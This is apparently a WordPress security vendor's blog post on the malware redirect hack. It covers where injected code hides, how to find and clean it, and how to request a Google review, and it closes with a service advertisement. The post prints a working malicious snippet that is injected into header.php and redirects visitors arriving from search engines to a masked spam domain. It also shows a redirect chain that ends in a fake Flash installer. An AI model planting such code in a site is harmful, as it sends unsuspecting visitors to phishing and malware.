WordPress Malware Redirect Hack - How To Detect & Fix It

WordPress Malware Redirect is a malicious code which redirects visitors to other site

wordpress hacked redirect cleanup Does your WordPress site redirects to another site?

No one is 100% safe from having their website hacked (⚠️even the FBI’s website gets hacked). Hacking is common yet one of the most common devastating experience for the website owners. Often, we come across people asking questions such as why my website is being redirected to another site, or, how to stop websites redirecting to another website. This could be due to an infected wordpress plugin, malware injected .header.php and footer.php or .htaccess.We have seen many instances of such hack where WordPress Site Redirects to Another Site and have fixed it successfully. You are here, that means you want to know more about this hack. In this in-depth post you will know more about this hack and how to fix it.

These hackers may make out money, data and confidential information from your website. If in any case, your website is being redirected to phishing or malware websites then get ready for the consequences.

Yes, of course, Google is not going to take any chance with its reputation and you are definitely going to be penalized by Google maybe your WordPress site gets blacklisted in google. So, it’s very important to know what should be done right away when you see your wordpress hacked redirecting to spam malware site.

WordPress Hacked Redirect What is WordPress Malware Redirect Hack?

website is being redirected to another malware site

🔴 “WordPress Malware Redirect” or “WordPress Redirect Hack” as it is commonly used, is a hack where your site visitors are automatically redirected to malicious website, phishing page and malware websites. It is likely due to the code injected in your WordPress database, this lead your WordPress site to redirect to another site.

Generally, a malicious WordPress Hacked Redirect is detected through the site’s front end when a visitor is redirected to any other page instead of the page or any website he requested. In most of the cases hackers use a particular malicious code to redirect the website to a porn or scam website to harm your website. Commonly used tricks to redirect website to another site includes:

  • Adding themselves as a ghost admin on your website
  • Injecting or uploading a malicious code in your WordPress site
  • Executing .php code

If any malicious script is added by hackers it’s often named to look like a legitimate file like that’s the part of WordPress core files on the website. Hackers can add malicious code to wp-content/plugins or wp-content/uploads folders, .htaccess, wp-includes, wp-content/themes, or wp-config.php file.

Also Read – How To Remove Malware From WordPress Site

Clean WordPress Malware Redirect Malicious Codes Inserted in WordPress sites?

removing malicious redirects from your site

If your WordPress website is infected with malicious redirects, check the following areas for suspicious code:

  • Core WordPress Files
  • index.php
  • index.html
  • .htaccess file
  • theme files
  • header.php (in the themes folder)
  • footer.php (in the themes folder)
  • functions.php (in the themes folder)

Few instances of presence of malicious code, which resulted in randomly redirects visitors to malicious sites on hacked WordPress sites.

Header.php Injection

In general, the malicious code of 10 to 12 lines is inserted in header.php of the WordPress website.


When this code is decoded the main part of the malware looks somewhat like this:

 site redirecting malware-code-decoded

There is a logic behind the code. It will simply redirect the visitors to default7.com if in case it’s the first visit then it can set 896diC9OFnqeAcKGN7fW cookie for 1 year approx. to track the returning visitors.

  • Malicious code inserted in footer
  • Malicious code inserted in themes header.php file

Malicious code

echo'<script>var s = document.referrer;if (s.indexOf("google") > 0 || s.indexOf("bing") > 0 || s.indexOf("yahoo") > 0 || s.indexOf("aol") > 0) {  self.location = \'http://yee****boost**750***sale*.com/\';}</script > '; ?>

Depending on the browser and IP a user can be redirected to any random domain listed below

  • test0 .com
  • distinctfestive .com
  • default7 .com
  • ableoccassion .com
  • test246 .com
  • 404.php

There are various other effects of this malware that are somehow caused by few obvious bugs in the malicious code.

For example, see this line #9 in the decoded version

if ($_GET['6FoNxbvo73BHOjhxokW3'] !== NULL) {

For some reason the malware checks for the 6FoNxbvo73BHOjhxokW3 parameter, generally can’t do anything if a GET requests contains it. It’s not a problem though. The problem is that the code doesn’t make sure such a parameter exists before checking its value. In PHP, this causes a notice like this:

Notice: Undefined index: 6FoNxbvo73BHOjhxokW3 in /home/account/public_html/wp-content/themes/currenttheme/header.php(8) : eval()’d code on line 9

fake-adobe-flash-update-random redirects to malicious site

The strange case is when you use Internet Explorer the redirect chain may somewhat look like this:

default7 .com
-> advertisementexample .com/d/p/test246.com?k=e88965c228fb1da3ff5ecff0d3034e7a.1462363771.823.1&r=
-> maintainpc .soft2update .xyz/vtrescs?tyercv=5qe5FetFrItyco5HNTadzxMu9Nwdv__MlK_dmzyotoo.&subid=102860_bebd063b36f47778fce4592efccae37a&v_id=e5tsIAwpqr6ffJ2kShbqE1F3WXTIU4auGIx7jpVqifk.
-> intva31 .saturnlibrary .info/dl-pure/1202331/31254524/?bc=1202331&checksum=31254524&ephemeral=1&filename=adobe_flash_player.exe&cb=-1388370582&hashstring=oZy9K7h7eaHC&usefilename=true&executableroutePath=1202245&stub=true

This code leads to the websites that push fake java and flash player updates on your screen. see above attached screenshot for reference.

How to clean WordPress malware redirects to another site

Detect and clean Redirect HackHow to detect and clean WordPress Redirect Hack?

Follow these steps to be taken in order to detect and clean redirect hack.

  • Before you start fixing WordPress malware redirect hack, ensure your website is temporarily put offline. By doing this you can have enough time to solve the problem and also prevent your users from visiting the hacked pages.
  • Always take a backup before making any changes in the core files and the database of the website. The backup should also contain the hacked pages and can be be referred in case the necessary content is accidentally removed. Also, be surer to keep a copy of all the files that you work with.
  • In case you have less knowledge about JavaScript, CMS or PHP files of your website, it’s strictly recommended to consult a professional to deal with the issue.

Follow this simple 5-Step guide to remove the redirect malware or malicious code from your WordPress site which results in redirects to another site:

remove malicious code from WordPressScan Your WordPress Site

There are various ways of checking your site and in any case you find that your website has been hacked with a malicious script, you need to generate a complete backup of your website. While removing malware from wordpress site you might make any mistake and then that backup acts as your savior. Once you have backed up your complete website, you’re ready to run a website scan using a WordPress Malware Scanner.

Wordpress Malware Scanner

Find Malicious redirect CodeFind the Malicious Code

There are number of places where you can locate the malicious code on your website. We understand it’s definitely not an easy task to scan the code chunk by chunk in each page of your website. There are times when the culprit can be enclosed somewhere in your server. And for few places you’ll need ftp/ftps login details to get access to these places to start the malware cleaning process.

website is redirecting

  • In case, the website is redirecting to an anonymous website(s), then look for the suspicious code in the following areas:
    • check both index.php and index.html!
    • .htaccess file
  • In case your website is triggering visitors for downloads, please have a look at out the following places:
    • Header.php
    • Footer.php
    • Your website’s index file (Check both)
    • Your theme’s files

Deeper Dig in the website

At times there is no harm in running tests to analyse whether your website is infected with a malware/malicious code or not. For this, you can use any test to pretend you’re a user agent or Google bot using a googlebot simulator or you can also use FETCH AS GOOGLE from the website’s webmaster console. There are few commands that work through ssh client. By employing certain code you can look into that place where the hacking has been done and further WordPress malware removal can be done manually too. [📒 Also Read How to Scan & Detect Malware in WordPress Themes ]

fetch as google to detect malware in wordpress site

Remove URL search consoleRemoving Bad Code

You’ll need to remove the malicious scripts that causes website redirection to the abusive sites. The malicious code with the new pages can be removed from the Search Engine Results together by using the remove URLs feature and by going to Google’s Search Engine Console. Also, update the plugins, themes and ensure the new core theme is installed plus up-to-date. Change or reset the passwords.

Request Removal search console

Malware reconsideration requestSubmit Malware reconsideration request using Search console

Google Webmaster tool is one of the best tool for webmaster which you can get for free, and if you have not yet submitted your Website in GWT, you are missing out many vital information regarding your website. Here I’m sharing step by step guide to put malware review request using Google Webmaster tool:

Here you will see list of URL, google is suspecting that is infected with malware. Once you have cleaned all hacked files and your website is malware free, simply click on request a review, and add notes in the form of actions you have taken to remove the malware.


WordPress website redirects to spamHow to Protect your site from WordPress Malware Redirects?

It’s important to📒 harden your WordPress security by following the guidelines listed below:

🛡️WordPress Malware Removal With WP Hacked Help🛡️

If you don’t have time or the expertise to scan and clean up WordPress Hacked Redirect then we can do it for you. This is a priority service that will restore your redirect malware infected WordPress site in a day or less. We take 📒wordpress database backup manually & scan your entire site to ensure all malware is deleted, and all infected and vulnerable files are replaced with fresh, secure copies.

Our WordpPress Malware Removal service helps to remove all malware, wordpress backdoors, Google blacklist warning, and protection against common WordPress vulnerabilities & future attacks such as Brute Force attacks & DDOS attacks.

Our Next Gen WordPress security services includes malware removal, hack recovery, WordPress hardening, WordPress updates, secure backups and much more.

Fix Hacked WordPress Website & Remove Malware -